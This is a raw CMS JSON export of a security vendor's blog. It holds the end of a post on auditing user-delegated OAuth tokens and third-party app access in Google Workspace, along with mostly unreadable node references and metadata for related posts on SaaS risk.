the actual scopes in ",{"data":339170,"content":339171,"nodeType":186},{"uri":334794},[339172],{"data":339173,"marks":339174,"value":339175,"nodeType":173},{},[],"Google's API docs",{"data":339177,"marks":339178,"value":339179,"nodeType":173},{},[],"), the app name (display name as above) and the all important ",{"data":339181,"marks":339182,"value":339184,"nodeType":173},{},[339183],{"type":1646},"client_id",{"data":339186,"marks":339187,"value":339188,"nodeType":173},{},[]," that is, as far as I can tell, the closes we get to uniquely identifying an app under the hood. As a side note, it turns out that the first number sequence of the ",{"data":339190,"marks":339191,"value":339184,"nodeType":173},{},[339192],{"type":1646},{"data":339194,"marks":339195,"value":339196,"nodeType":173},{},[]," is actually the project number of the Google Cloud Project which hosts the app (or technically which hosts the OAuth consent screen for the app). Still no verification status, and no way to figure out who published the app. Further down the rabbit hole we go.",{"data":339198,"content":339199,"nodeType":178},{},[339200,339204,339209,339213,339221],{"data":339201,"marks":339202,"value":339203,"nodeType":173},{},[],"Workspace Admin also has an API, and fortunately there is a ",{"data":339205,"marks":339206,"value":339208,"nodeType":173},{},[339207],{"type":1646},"tokens",{"data":339210,"marks":339211,"value":339212,"nodeType":173},{},[]," resource (see Google docs for ",{"data":339214,"content":339216,"nodeType":186},{"uri":339215},"https://developers.google.com/admin-sdk/directory/reference/rest/v1/tokens/list",[339217],{"data":339218,"marks":339219,"value":339220,"nodeType":173},{},[],"Admin Directory API",{"data":339222,"marks":339223,"value":339224,"nodeType":173},{},[],") and there is even an API explorer (which - strange loop warning - also uses OAuth tokens to grant itself access to the API), which give you the following:",{"data":339226,"content":339230,"nodeType":312},{"target":339227},{"sys":339228},{"id":339229,"type":317,"linkType":318},"1zbptRPMoy5F9eexuoqdBh",[],{"data":339232,"content":339233,"nodeType":178},{},[339234,339238,339242],{"data":339235,"marks":339236,"value":339237,"nodeType":173},{},[],"Which actually gives you all the tokens for a user you specify. Not much here that is useful beyond what we got from the token report - we still just have display name, scopes, and the ",{"data":339239,"marks":339240,"value":339184,"nodeType":173},{},[339241],{"type":1646},{"data":339243,"marks":339244,"value":339245,"nodeType":173},{},[]," - however, we can now at least automate the process of pulling all apps for all users without having to figure out which are still active after grants and revokes in the audit report.",{"data":339247,"content":339248,"nodeType":178},{},[339249,339253,339257,339261,339269],{"data":339250,"marks":339251,"value":339252,"nodeType":173},{},[],"At this point I was worried whether this would be possible as I couldn’t find any APIs that actually resolved the ",{"data":339254,"marks":339255,"value":339184,"nodeType":173},{},[339256],{"type":1646},{"data":339258,"marks":339259,"value":339260,"nodeType":173},{},[]," to something more useful, so I started looking at ways to restrict installing apps instead. This led me to the ",{"data":339262,"content":339264,"nodeType":186},{"uri":339263},"https://admin.google.com/ac/owl/list",[339265],{"data":339266,"marks":339267,"value":339268,"nodeType":173},{},[],"Security > API controls > App access control",{"data":339270,"marks":339271,"value":339272,"nodeType":173},{},[]," panel in the admin console. This panel shows a list of all the trusted apps (which includes all the installed apps), and crucially if you click on the app you get something like the following:",{"data":339274,"content":339278,"nodeType":312},{"target":339275},{"sys":339276},{"id":339277,"type":317,"linkType":318},"3zM9a2NGzAdRVjQ0EN4Ult",[],{"data":339280,"content":339281,"nodeType":178},{},[339282],{"data":339283,"marks":339284,"value":339285,"nodeType":173},{},[],"Huzzah! - finally we have verification status, as well as an email address and links to various policies which can be used to identify the actual publisher of the app (my assumption here is that if the app is verified we can trust this information, but that might be something worth digging into a bit deeper, especially for apps that are not requesting sensitive or restricted scopes, both of which have increasingly thorough vetting).",{"data":339287,"content":339288,"nodeType":178},{},[339289],{"data":339290,"marks":339291,"value":339292,"nodeType":173},{},[],"Unfortunately this is not the end of the story. There are still a couple of problems here, firstly we can’t see which users granted which tokens - only how many users have active tokens. We could correlate this with the information in the user’s profile, but then you could have multiple apps using the same name as below:",{"data":339294,"content":339298,"nodeType":312},{"target":339295},{"sys":339296},{"id":339297,"type":317,"linkType":318},"2fSxeH8UZCC5cZ6vggwck",[],{"data":339300,"content":339301,"nodeType":178},{},[339302,339306,339310,339313,339320],{"data":339303,"marks":339304,"value":339305,"nodeType":173},{},[],"This can be solved by referencing the ",{"data":339307,"marks":339308,"value":339184,"nodeType":173},{},[339309],{"type":1646},{"data":339311,"marks":339312,"value":27978,"nodeType":173},{},[],{"data":339314,"content":339315,"nodeType":186},{"uri":339215},[339316],{"data":339317,"marks":339318,"value":339319,"nodeType":173},{},[],"admin.directory.tokens.list",{"data":339321,"marks":339322,"value":339323,"nodeType":173},{},[]," API (as discussed above), but that brings us to my final problem - it’s going to be painful cross referencing as the data in the screenshot above is not available in any API I can find, so to automate this I guess we’re going screen scraping 🤦. If you know a better way - please tweet me (again @jacques_sec).",{"data":339325,"content":339326,"nodeType":235},{},[339327],{"data":339328,"marks":339329,"value":339330,"nodeType":173},{},[],"Next up",{"data":339332,"content":339333,"nodeType":178},{},[339334],{"data":339335,"marks":339336,"value":339337,"nodeType":173},{},[],"I’m planning to write future posts on this subject before I forget it all, and these will likely focus on understanding exactly what is possible using specific scopes in a more automated way than paging through endless docs, and more detail on doing in-depth security reviews of OAuth apps. Get in touch if either of these (or something related) would be of interest to you and we might re-prioritise!",{"data":339339,"content":339340,"nodeType":178},{},[339341],{"data":339342,"marks":339343,"value":13836,"nodeType":173},{},[],"Investigating user delegated OAuth tokens in Google Workspace - a ride along","Introduction to OAuth tokens in Google Workspace, how they are used, reasons you might want to review them, and a discussion of how you might go about it. ",[339347,339348,339349,339350,339351],"#oauth","#oauth2","#cloud-apps","#google","#workspace","2021-07-15T00:00:00.000+01:00","investigating-user-delegated-oauth-tokens-in-google-workspace-a-ride-along",{"items":339355},[339356,339358],{"sys":339357,"name":509},{"id":508},{"sys":339359,"name":26137},{"id":26136},{"items":339361},[339362],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":339363},{"url":13981},{"items":339365},[339366],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":339367},{"url":13981},{"json":339369,"links":339896},{"nodeType":165,"data":339370,"content":339371},{},[339372,339382,339388,339394,339400,339406,339429,339435,339450,339456,339472,339478,339483,339605,339611,339617,339623,339669,339675,339690,339696,339702,339708,339714,339720,339726,339732,339738,339744,339750,339756,339762,339782,339788,339794,339800,339806,339812,339818,339824,339830,339836,339842,339848,339854,339860,339866,339872,339875,339881,339884,339890],{"nodeType":178,"data":339373,"content":339374},{},[339375,339378],{"nodeType":173,"value":296810,"marks":339376,"data":339377},[],{},{"nodeType":173,"value":296814,"marks":339379,"data":339381},[339380],{"type":1646},{},{"nodeType":178,"data":339383,"content":339384},{},[339385],{"nodeType":173,"value":296822,"marks":339386,"data":339387},[],{},{"nodeType":178,"data":339389,"content":339390},{},[339391],{"nodeType":173,"value":296829,"marks":339392,"data":339393},[],{},{"nodeType":178,"data":339395,"content":339396},{},[339397],{"nodeType":173,"value":296836,"marks":339398,"data":339399},[],{},{"nodeType":169,"data":339401,"content":339402},{},[339403],{"nodeType":173,"value":296843,"marks":339404,"data":339405},[],{},{"nodeType":178,"data":339407,"content":339408},{},[339409,339412,339416,339419,339426],{"nodeType":173,"value":296850,"marks":339410,"data":339411},[],{},{"nodeType":173,"value":296854,"marks":339413,"data":339415},[339414],{"type":194},{},{"nodeType":173,"value":296859,"marks":339417,"data":339418},[],{},{"nodeType":186,"data":339420,"content":339421},{"uri":296864},[339422],{"nodeType":173,"value":5387,"marks":339423,"data":339425},[339424],{"type":194},{},{"nodeType":173,"value":296871,"marks":339427,"data":339428},[],{},{"nodeType":178,"data":339430,"content":339431},{},[339432],{"nodeType":173,"value":296878,"marks":339433,"data":339434},[],{},{"nodeType":178,"data":339436,"content":339437},{},[339438,339441,339447],{"nodeType":173,"value":296885,"marks":339439,"data":339440},[],{},{"nodeType":186,"data":339442,"content":339443},{"uri":296890},[339444],{"nodeType":173,"value":296893,"marks":339445,"data":339446},[],{},{"nodeType":173,"value":296897,"marks":339448,"data":339449},[],{},{"nodeType":169,"data":339451,"content":339452},{},[339453],{"nodeType":173,"value":296904,"marks":339454,"data":339455},[],{},{"nodeType":178,"data":339457,"content":339458},{},[339459,339462,339469],{"nodeType":173,"value":296911,"marks":339460,"data":339461},[],{},{"nodeType":186,"data":339463,"content":339464},{"uri":296916},[339465],{"nodeType":173,"value":24477,"marks":339466,"data":339468},[339467],{"type":194},{},{"nodeType":173,"value":296923,"marks":339470,"data":339471},[],{},{"nodeType":178,"data":339473,"content":339474},{},[339475],{"nodeType":173,"value":296930,"marks":339476,"data":339477},[],{},{"nodeType":312,"data":339479,"content":339482},{"target":339480},{"sys":339481},{"id":296937,"type":317,"linkType":318},[],{"nodeType":246189,"data":339484,"content":339485},{},[339486,339538,339551,339564,339577],{"nodeType":254,"data":339487,"content":339488},{},[339489,339499],{"nodeType":178,"data":339490,"content":339491},{},[339492,339496],{"nodeType":173,"value":296949,"marks":339493,"data":339495},[339494],{"type":370},{},{"nodeType":173,"value":296954,"marks":339497,"data":339498},[],{},{"nodeType":246189,"data":339500,"content":339501},{},[339502,339511,339520,339529],{"nodeType":254,"data":339503,"content":339504},{},[339505],{"nodeType":178,"data":339506,"content":339507},{},[339508],{"nodeType":173,"value":296967,"marks":339509,"data":339510},[],{},{"nodeType":254,"data":339512,"content":339513},{},[339514],{"nodeType":178,"data":339515,"content":339516},{},[339517],{"nodeType":173,"value":296977,"marks":339518,"data":339519},[],{},{"nodeType":254,"data":339521,"content":339522},{},[339523],{"nodeType":178,"data":339524,"content":339525},{},[339526],{"nodeType":173,"value":296987,"marks":339527,"data":339528},[],{},{"nodeType":254,"data":339530,"content":339531},{},[339532],{"nodeType":178,"data":339533,"content":339534},{},[339535],{"nodeType":173,"value":296997,"marks":339536,"data":339537},[],{},{"nodeType":254,"data":339539,"content":339540},{},[339541],{"nodeType":178,"data":339542,"content":339543},{},[339544,339548],{"nodeType":173,"value":297007,"marks":339545,"data":339547},[339546],{"type":370},{},{"nodeType":173,"value":297012,"marks":339549,"data":339550},[],{},{"nodeType":254,"data":339552,"content":339553},{},[339554],{"nodeType":178,"data":339555,"content":339556},{},[339557,339561],{"nodeType":173,"value":297022,"marks":339558,"data":339560},[339559],{"type":370},{},{"nodeType":173,"value":297027,"marks":339562,"data":339563},[],{},{"nodeType":254,"data":339565,"content":339566},{},[339567],{"nodeType":178,"data":339568,"content":339569},{},[339570,339574],{"nodeType":173,"value":297037,"marks":339571,"data":339573},[339572],{"type":370},{},{"nodeType":173,"value":297042,"marks":339575,"data":339576},[],{},{"nodeType":254,"data":339578,"content":339579},{},[339580,339593],{"nodeType":178,"data":339581,"content":339582},{},[339583,339586,339590],{"nodeType":173,"value":297052,"marks":339584,"data":339585},[],{},{"nodeType":173,"value":297056,"marks":339587,"data":339589},[339588],{"type":370},{},{"nodeType":173,"value":297061,"marks":339591,"data":339592},[],{},{"nodeType":246189,"data":339594,"content":339595},{},[339596],{"nodeType":254,"data":339597,"content":339598},{},[339599],{"nodeType":178,"data":339600,"content":339601},{},[339602],{"nodeType":173,"value":297074,"marks":339603,"data":339604},[],{},{"nodeType":178,"data":339606,"content":339607},{},[339608],{"nodeType":173,"value":297081,"marks":339609,"data":339610},[],{},{"nodeType":169,"data":339612,"content":339613},{},[339614],{"nodeType":173,"value":297088,"marks":339615,"data":339616},[],{},{"nodeType":178,"data":339618,"content":339619},{},[339620],{"nodeType":173,"value":297095,"marks":339621,"data":339622},[],{},{"nodeType":250,"data":339624,"content":339625},{},[339626,339635,339644,339660],{"nodeType":254,"data":339627,"content":339628},{},[339629],{"nodeType":178,"data":339630,"content":339631},{},[339632],{"nodeType":173,"value":297108,"marks":339633,"data":339634},[],{},{"nodeType":254,"data":339636,"content":339637},{},[339638],{"nodeType":178,"data":339639,"content":339640},{},[339641],{"nodeType":173,"value":297118,"marks":339642,"data":339643},[],{},{"nodeType":254,"data":339645,"content":339646},{},[339647],{"nodeType":178,"data":339648,"content":339649},{},[339650,339653,339657],{"nodeType":173,"value":297128,"marks":339651,"data":339652},[],{},{"nodeType":173,"value":297132,"marks":339654,"data":339656},[339655],{"type":1646},{},{"nodeType":173,"value":297137,"marks":339658,"data":339659},[],{},{"nodeType":254,"data":339661,"content":339662},{},[339663],{"nodeType":178,"data":339664,"content":339665},{},[339666],{"nodeType":173,"value":297147,"marks":339667,"data":339668},[],{},{"nodeType":178,"data":339670,"content":339671},{},[339672],{"nodeType":173,"value":297154,"marks":339673,"data":339674},[],{},{"nodeType":178,"data":339676,"content":339677},{},[339678,339681,339687],{"nodeType":173,"value":297161,"marks":339679,"data":339680},[],{},{"nodeType":186,"data":339682,"content":339683},{"uri":297166},[339684],{"nodeType":173,"value":297169,"marks":339685,"data":339686},[],{},{"nodeType":173,"value":297173,"marks":339688,"data":339689},[],{},{"nodeType":178,"data":339691,"content":339692},{},[339693],{"nodeType":173,"value":297180,"marks":339694,"data":339695},[],{},{"nodeType":169,"data":339697,"content":339698},{},[339699],{"nodeType":173,"value":297187,"marks":339700,"data":339701},[],{},{"nodeType":178,"data":339703,"content":339704},{},[339705],{"nodeType":173,"value":297194,"marks":339706,"data":339707},[],{},{"nodeType":178,"data":339709,"content":339710},{},[339711],{"nodeType":173,"value":297201,"marks":339712,"data":339713},[],{},{"nodeType":178,"data":339715,"content":339716},{},[339717],{"nodeType":173,"value":297208,"marks":339718,"data":339719},[],{},{"nodeType":178,"data":339721,"content":339722},{},[339723],{"nodeType":173,"value":297215,"marks":339724,"data":339725},[],{},{"nodeType":169,"data":339727,"content":339728},{},[339729],{"nodeType":173,"value":297222,"marks":339730,"data":339731},[],{},{"nodeType":178,"data":339733,"content":339734},{},[339735],{"nodeType":173,"value":297229,"marks":339736,"data":339737},[],{},{"nodeType":178,"data":339739,"content":339740},{},[339741],{"nodeType":173,"value":297236,"marks":339742,"data":339743},[],{},{"nodeType":235,"data":339745,"content":339746},{},[339747],{"nodeType":173,"value":297243,"marks":339748,"data":339749},[],{},{"nodeType":178,"data":339751,"content":339752},{},[339753],{"nodeType":173,"value":297250,"marks":339754,"data":339755},[],{},{"nodeType":178,"data":339757,"content":339758},{},[339759],{"nodeType":173,"value":297257,"marks":339760,"data":339761},[],{},{"nodeType":178,"data":339763,"content":339764},{},[339765,339768,339775,339779],{"nodeType":173,"value":297264,"marks":339766,"data":339767},[],{},{"nodeType":186,"data":339769,"content":339770},{"uri":297269},[339771],{"nodeType":173,"value":297272,"marks":339772,"data":339774},[339773],{"type":194},{},{"nodeType":173,"value":3107,"marks":339776,"data":339778},[339777],{"type":194},{},{"nodeType":173,"value":297281,"marks":339780,"data":339781},[],{},{"nodeType":178,"data":339783,"content":339784},{},[339785],{"nodeType":173,"value":297288,"marks":339786,"data":339787},[],{},{"nodeType":235,"data":339789,"content":339790},{},[339791],{"nodeType":173,"value":297295,"marks":339792,"data":339793},[],{},{"nodeType":178,"data":339795,"content":339796},{},[339797],{"nodeType":173,"value":297302,"marks":339798,"data":339799},[],{},{"nodeType":178,"data":339801,"content":339802},{},[339803],{"nodeType":173,"value":297309,"marks":339804,"data":339805},[],{},{"nodeType":178,"data":339807,"content":339808},{},[339809],{"nodeType":173,"value":297316,"marks":339810,"data":339811},[],{},{"nodeType":178,"data":339813,"content":339814},{},[339815],{"nodeType":173,"value":297323,"marks":339816,"data":339817},[],{},{"nodeType":178,"data":339819,"content":339820},{},[339821],{"nodeType":173,"value":297330,"marks":339822,"data":339823},[],{},{"nodeType":235,"data":339825,"content":339826},{},[339827],{"nodeType":173,"value":297337,"marks":339828,"data":339829},[],{},{"nodeType":178,"data":339831,"content":339832},{},[339833],{"nodeType":173,"value":297344,"marks":339834,"data":339835},[],{},{"nodeType":178,"data":339837,"content":339838},{},[339839],{"nodeType":173,"value":297351,"marks":339840,"data":339841},[],{},{"nodeType":235,"data":339843,"content":339844},{},[339845],{"nodeType":173,"value":297358,"marks":339846,"data":339847},[],{},{"nodeType":178,"data":339849,"content":339850},{},[339851],{"nodeType":173,"value":297365,"marks":339852,"data":339853},[],{},{"nodeType":178,"data":339855,"content":339856},{},[339857],{"nodeType":173,"value":297372,"marks":339858,"data":339859},[],{},{"nodeType":169,"data":339861,"content":339862},{},[339863],{"nodeType":173,"value":297379,"marks":339864,"data":339865},[],{},{"nodeType":178,"data":339867,"content":339868},{},[339869],{"nodeType":173,"value":297386,"marks":339870,"data":339871},[],{},{"nodeType":231,"data":339873,"content":339874},{},[],{"nodeType":178,"data":339876,"content":339877},{},[339878],{"nodeType":173,"value":297396,"marks":339879,"data":339880},[],{},{"nodeType":231,"data":339882,"content":339883},{},[],{"nodeType":178,"data":339885,"content":339886},{},[339887],{"nodeType":173,"value":297406,"marks":339888,"data":339889},[],{},{"nodeType":178,"data":339891,"content":339892},{},[339893],{"nodeType":173,"value":297413,"marks":339894,"data":339895},[],{},{"entries":339897},{"hyperlink":339898,"inline":339899,"block":339900},[],[],[339901],{"sys":339902,"__typename":5345,"title":339903,"caption":118,"layoutMode":118,"file":339904},{"id":296937},"SaaS Risk checklist",{"url":339905,"width":277481,"height":277481},"https://images.ctfassets.net/y1cdw1ablpvd/3k9PBx2owoAsp0IUd6roHE/80898d4779f70c75d3e619c0568c6200/checklist-v5__1_.png","content:blog:manage-saas-risks-without-hindering-employees.json","blog/manage-saas-risks-without-hindering-employees.json","blog/manage-saas-risks-without-hindering-employees",{"_path":339910,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":339911,"ogImage":118,"summary":339913,"title":294049,"subtitle":118,"metaTitle":339930,"synopsis":294050,"hashTags":118,"publishedDate":294051,"slug":294052,"tagsCollection":339931,"content":339937,"relatedBlogPostsCollection":340226,"authorsCollection":340721,"_id":340725,"_type":5439,"_source":5440,"_file":340726,"_stem":340727,"_extension":5439},"/blog/how-to-find-the-right-saas-security-solution-for-your-organization",{"id":293723,"publishedAt":339912},"2024-03-21T09:18:04.709Z",{"json":339914},{"data":339915,"content":339916,"nodeType":165},{},[339917,339924],{"data":339918,"content":339919,"nodeType":178},{},[339920],{"data":339921,"marks":339922,"value":339923,"nodeType":173},{},[],"We break down some major SaaS use cases and match them up with solutions that can address them.\n",{"data":339925,"content":339926,"nodeType":178},{},[339927],{"data":339928,"marks":339929,"value":13836,"nodeType":173},{},[],"How to evaluate SaaS security solutions for your company",{"items":339932},[339933,339935],{"sys":339934,"name":274157},{"id":274156},{"sys":339936,"name":26133},{"id":26132},{"json":339938,"links":340219},{"data":339939,"content":339940,"nodeType":165},{},[339941,339947,339964,339970,339976,339982,339988,339994,340000,340006,340012,340018,340024,340030,340036,340049,340055,340061,340067,340073,340079,340085,340100,340106,340112,340118,340124,340130,340137,340167,340174,340204],{"data":339942,"content":339943,"nodeType":178},{},[339944],{"data":339945,"marks":339946,"value":293734,"nodeType":173},{},[],{"data":339948,"content":339949,"nodeType":178},{},[339950,339953,339961],{"data":339951,"marks":339952,"value":293741,"nodeType":173},{},[],{"data":339954,"content":339957,"nodeType":1698},{"target":339955},{"sys":339956},{"id":282056,"type":317,"linkType":318},[339958],{"data":339959,"marks":339960,"value":247581,"nodeType":173},{},[],{"data":339962,"marks":339963,"value":293753,"nodeType":173},{},[],{"data":339965,"content":339966,"nodeType":178},{},[339967],{"data":339968,"marks":339969,"value":293760,"nodeType":173},{},[],{"data":339971,"content":339972,"nodeType":178},{},[339973],{"data":339974,"marks":339975,"value":293767,"nodeType":173},{},[],{"data":339977,"content":339978,"nodeType":178},{},[339979],{"data":339980,"marks":339981,"value":293774,"nodeType":173},{},[],{"data":339983,"content":339984,"nodeType":178},{},[339985],{"data":339986,"marks":339987,"value":293781,"nodeType":173},{},[],{"data":339989,"content":339990,"nodeType":235},{},[339991],{"data":339992,"marks":339993,"value":293788,"nodeType":173},{},[],{"data":339995,"content":339996,"nodeType":178},{},[339997],{"data":339998,"marks":339999,"value":293795,"nodeType":173},{},[],{"data":340001,"content":340002,"nodeType":178},{},[340003],{"data":340004,"marks":340005,"value":293802,"nodeType":173},{},[],{"data":340007,"content":340008,"nodeType":178},{},[340009],{"data":340010,"marks":340011,"value":293809,"nodeType":173},{},[],{"data":340013,"content":340014,"nodeType":178},{},[340015],{"data":340016,"marks":340017,"value":293816,"nodeType":173},{},[],{"data":340019,"content":340020,"nodeType":235},{},[340021],{"data":340022,"marks":340023,"value":293823,"nodeType":173},{},[],{"data":340025,"content":340026,"nodeType":178},{},[340027],{"data":340028,"marks":340029,"value":293830,"nodeType":173},{},[],{"data":340031,"content":340032,"nodeType":178},{},[340033],{"data":340034,"marks":340035,"value":293837,"nodeType":173},{},[],{"data":340037,"content":340038,"nodeType":178},{},[340039,340042,340046],{"data":340040,"marks":340041,"value":293844,"nodeType":173},{},[],{"data":340043,"marks":340044,"value":293849,"nodeType":173},{},[340045],{"type":1646},{"data":340047,"marks":340048,"value":293853,"nodeType":173},{},[],{"data":340050,"content":340051,"nodeType":178},{},[340052],{"data":340053,"marks":340054,"value":293860,"nodeType":173},{},[],{"data":340056,"content":340057,"nodeType":235},{},[340058],{"data":340059,"marks":340060,"value":293867,"nodeType":173},{},[],{"data":340062,"content":340063,"nodeType":178},{},[340064],{"data":340065,"marks":340066,"value":293874,"nodeType":173},{},[],{"data":340068,"content":340069,"nodeType":178},{},[340070],{"data":340071,"marks":340072,"value":293881,"nodeType":173},{},[],{"data":340074,"content":340075,"nodeType":178},{},[340076],{"data":340077,"marks":340078,"value":293888,"nodeType":173},{},[],{"data":340080,"content":340081,"nodeType":178},{},[340082],{"data":340083,"marks":340084,"value":293895,"nodeType":173},{},[],{"data":340086,"content":340087,"nodeType":178},{},[340088,340091,340097],{"data":340089,"marks":340090,"value":293902,"nodeType":173},{},[],{"data":340092,"content":340093,"nodeType":186},{"uri":293905},[340094],{"data":340095,"marks":340096,"value":293910,"nodeType":173},{},[],{"data":340098,"marks":340099,"value":197,"nodeType":173},{},[],{"data":340101,"content":340102,"nodeType":235},{},[340103],{"data":340104,"marks":340105,"value":293920,"nodeType":173},{},[],{"data":340107,"content":340108,"nodeType":178},{},[340109],{"data":340110,"marks":340111,"value":293927,"nodeType":173},{},[],{"data":340113,"content":340114,"nodeType":178},{},[340115],{"data":340116,"marks":340117,"value":293934,"nodeType":173},{},[],{"data":340119,"content":340120,"nodeType":235},{},[340121],{"data":340122,"marks":340123,"value":40632,"nodeType":173},{},[],{"data":340125,"content":340126,"nodeType":178},{},[340127],{"data":340128,"marks":340129,"value":293947,"nodeType":173},{},[],{"data":340131,"content":340132,"nodeType":178},{},[340133],{"data":340134,"marks":340135,"value":293955,"nodeType":173},{},[340136],{"type":370},{"data":340138,"content":340139,"nodeType":250},{},[340140,340149,340158],{"data":340141,"content":340142,"nodeType":254},{},[340143],{"data":340144,"content":340145,"nodeType":178},{},[340146],{"data":340147,"marks":340148,"value":293968,"nodeType":173},{},[],{"data":340150,"content":340151,"nodeType":254},{},[340152],{"data":340153,"content":340154,"nodeType":178},{},[340155],{"data":340156,"marks":340157,"value":293978,"nodeType":173},{},[],{"data":340159,"content":340160,"nodeType":254},{},[340161],{"data":340162,"content":340163,"nodeType":178},{},[340164],{"data":340165,"marks":340166,"value":293988,"nodeType":173},{},[],{"data":340168,"content":340169,"nodeType":178},{},[340170],{"data":340171,"marks":340172,"value":293996,"nodeType":173},{},[340173],{"type":370},{"data":340175,"content":340176,"nodeType":250},{},[340177,340186,340195],{"data":340178,"content":340179,"nodeType":254},{},[340180],{"data":340181,"content":340182,"nodeType":178},{},[340183],{"data":340184,"marks":340185,"value":294009,"nodeType":173},{},[],{"data":340187,"content":340188,"nodeType":254},{},[340189],{"data":340190,"content":340191,"nodeType":178},{},[340192],{"data":340193,"marks":340194,"value":294019,"nodeType":173},{},[],{"data":340196,"content":340197,"nodeType":254},{},[340198],{"data":340199,"content":340200,"nodeType":178},{},[340201],{"data":340202,"marks":340203,"value":294029,"nodeType":173},{},[],{"data":340205,"content":340206,"nodeType":178},{},[340207,340210,340216],{"data":340208,"marks":340209,"value":294036,"nodeType":173},{},[],{"data":340211,"content":340212,"nodeType":186},{"uri":294039},[340213],{"data":340214,"marks":340215,"value":294044,"nodeType":173},{},[],{"data":340217,"marks":340218,"value":294048,"nodeType":173},{},[],{"entries":340220},{"block":340221,"inline":340222,"hyperlink":340223},[],[],[340224],{"sys":340225,"__typename":1528,"title":298859,"slug":298860},{"id":282056},{"items":340227},[340228],{"__typename":1528,"sys":340229,"content":340230,"title":298859,"synopsis":320972,"hashTags":340710,"publishedDate":320979,"slug":298860,"tagsCollection":340711,"authorsCollection":340717},{"id":282056},{"json":340231},{"data":340232,"content":340233,"nodeType":165},{},[340234,340240,340246,340252,340258,340264,340284,340290,340296,340302,340308,340318,340324,340358,340378,340384,340390,340404,340410,340416,340429,340435,340442,340455,340461,340467,340473,340480,340486,340492,340498,340520,340577,340583,340589,340595,340608,340614,340627,340633,340643,340649,340666,340671,340686],{"data":340235,"content":340236,"nodeType":178},{},[340237],{"data":340238,"marks":340239,"value":320422,"nodeType":173},{},[],{"data":340241,"content":340242,"nodeType":178},{},[340243],{"data":340244,"marks":340245,"value":320429,"nodeType":173},{},[],{"data":340247,"content":340248,"nodeType":169},{},[340249],{"data":340250,"marks":340251,"value":320436,"nodeType":173},{},[],{"data":340253,"content":340254,"nodeType":178},{},[340255],{"data":340256,"marks":340257,"value":320443,"nodeType":173},{},[],{"data":340259,"content":340260,"nodeType":178},{},[340261],{"data":340262,"marks":340263,"value":320450,"nodeType":173},{},[],{"data":340265,"content":340266,"nodeType":178},{},[340267,340270,340274,340277,340281],{"data":340268,"marks":340269,"value":320457,"nodeType":173},{},[],{"data":340271,"marks":340272,"value":320462,"nodeType":173},{},[340273],{"type":1646},{"data":340275,"marks":340276,"value":320466,"nodeType":173},{},[],{"data":340278,"marks":340279,"value":320471,"nodeType":173},{},[340280],{"type":1646},{"data":340282,"marks":340283,"value":320475,"nodeType":173},{},[],{"data":340285,"content":340286,"nodeType":178},{},[340287],{"data":340288,"marks":340289,"value":320482,"nodeType":173},{},[],{"data":340291,"content":340292,"nodeType":169},{},[340293],{"data":340294,"marks":340295,"value":320489,"nodeType":173},{},[],{"data":340297,"content":340298,"nodeType":178},{},[340299],{"data":340300,"marks":340301,"value":320496,"nodeType":173},{},[],{"data":340303,"content":340304,"nodeType":169},{},[340305],{"data":340306,"marks":340307,"value":320503,"nodeType":173},{},[],{"data":340309,"content":340310,"nodeType":178},{},[340311,340314],{"data":340312,"marks":340313,"value":13836,"nodeType":173},{},[],{"data":340315,"marks":340316,"value":320514,"nodeType":173},{},[340317],{"type":1646},{"data":340319,"content":340320,"nodeType":178},{},[340321],{"data":340322,"marks":340323,"value":320521,"nodeType":173},{},[],{"data":340325,"content":340326,"nodeType":178},{},[340327,340330,340334,340337,340341,340344,340348,340351,340355],{"data":340328,"marks":340329,"value":320528,"nodeType":173},{},[],{"data":340331,"marks":340332,"value":320462,"nodeType":173},{},[340333],{"type":1646},{"data":340335,"marks":340336,"value":320536,"nodeType":173},{},[],{"data":340338,"marks":340339,"value":320541,"nodeType":173},{},[340340],{"type":1646},{"data":340342,"marks":340343,"value":320545,"nodeType":173},{},[],{"data":340345,"marks":340346,"value":320462,"nodeType":173},{},[340347],{"type":1646},{"data":340349,"marks":340350,"value":320553,"nodeType":173},{},[],{"data":340352,"marks":340353,"value":320471,"nodeType":173},{},[340354],{"type":1646},{"data":340356,"marks":340357,"value":1477,"nodeType":173},{},[],{"data":340359,"content":340360,"nodeType":178},{},[340361,340364,340368,340371,340375],{"data":340362,"marks":340363,"value":320567,"nodeType":173},{},[],{"data":340365,"marks":340366,"value":320572,"nodeType":173},{},[340367],{"type":1646},{"data":340369,"marks":340370,"value":320576,"nodeType":173},{},[],{"data":340372,"marks":340373,"value":320581,"nodeType":173},{},[340374],{"type":1646},{"data":340376,"marks":340377,"value":320585,"nodeType":173},{},[],{"data":340379,"content":340380,"nodeType":178},{},[340381],{"data":340382,"marks":340383,"value":320592,"nodeType":173},{},[],{"data":340385,"content":340386,"nodeType":169},{},[340387],{"data":340388,"marks":340389,"value":320599,"nodeType":173},{},[],{"data":340391,"content":340392,"nodeType":178},{},[340393,340397,340400],{"data":340394,"marks":340395,"value":320607,"nodeType":173},{},[340396],{"type":1646},{"data":340398,"marks":340399,"value":3107,"nodeType":173},{},[],{"data":340401,"marks":340402,"value":320615,"nodeType":173},{},[340403],{"type":1646},{"data":340405,"content":340406,"nodeType":178},{},[340407],{"data":340408,"marks":340409,"value":320622,"nodeType":173},{},[],{"data":340411,"content":340412,"nodeType":178},{},[340413],{"data":340414,"marks":340415,"value":320629,"nodeType":173},{},[],{"data":340417,"content":340418,"nodeType":178},{},[340419,340422,340426],{"data":340420,"marks":340421,"value":320636,"nodeType":173},{},[],{"data":340423,"marks":340424,"value":320641,"nodeType":173},{},[340425],{"type":1646},{"data":340427,"marks":340428,"value":320645,"nodeType":173},{},[],{"data":340430,"content":340431,"nodeType":169},{},[340432],{"data":340433,"marks":340434,"value":320652,"nodeType":173},{},[],{"data":340436,"content":340437,"nodeType":178},{},[340438],{"data":340439,"marks":340440,"value":320660,"nodeType":173},{},[340441],{"type":1646},{"data":340443,"content":340444,"nodeType":178},{},[340445,340448,340452],{"data":340446,"marks":340447,"value":320667,"nodeType":173},{},[],{"data":340449,"marks":340450,"value":320672,"nodeType":173},{},[340451],{"type":1646},{"data":340453,"marks":340454,"value":320676,"nodeType":173},{},[],{"data":340456,"content":340457,"nodeType":178},{},[340458],{"data":340459,"marks":340460,"value":320683,"nodeType":173},{},[],{"data":340462,"content":340463,"nodeType":178},{},[340464],{"data":340465,"marks":340466,"value":320690,"nodeType":173},{},[],{"data":340468,"content":340469,"nodeType":169},{},[340470],{"data":340471,"marks":340472,"value":320697,"nodeType":173},{},[],{"data":340474,"content":340475,"nodeType":178},{},[340476],{"data":340477,"